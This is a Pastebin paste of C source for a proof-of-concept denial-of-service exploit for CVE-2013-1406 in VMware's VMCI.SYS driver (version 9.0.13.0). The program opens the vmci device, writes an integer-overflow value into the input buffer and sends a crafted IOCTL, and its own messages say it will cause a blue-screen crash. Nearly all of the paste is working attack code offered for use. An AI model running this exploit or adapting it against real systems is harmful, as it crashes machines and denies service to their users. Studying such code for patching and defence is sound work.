Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- This PoC only for version
- VMCI.SYS 9.0.13.0
- */
- #include "stdafx.h"
- #include "windows.h"
- #define count_massive 0x189
- #define ioctl_vmsock 0x8103208C
- #define integer_overflow_size 0x12492492;
- int _tmain(int argc, _TCHAR* argv[])
- {
- HANDLE vmci_device;
- DWORD bytesRet;
- int inbuf [count_massive];
- int outbuf[count_massive];
- int size_=count_massive*sizeof(int);
- printf("**************************************************\r\n");
- printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
- printf("**************************************************\r\n");
- //opening vmci interface device
- vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
- if (vmci_device!=INVALID_HANDLE_VALUE)
- {
- printf("[+]vmci device opened \r\n");
- //prepare input buffer
- memset(&inbuf,0,size_);
- //vulnerable to integer overflowing parameter
- inbuf[4]=integer_overflow_size;
- printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
- //Delaying signed with Diablo stamp :D
- Sleep(0x29a);
- Sleep(0x1000);
- DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
- CloseHandle(vmci_device);
- }
- else
- {
- printf("[-]Error: Can't open vmci device!\r\n");
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement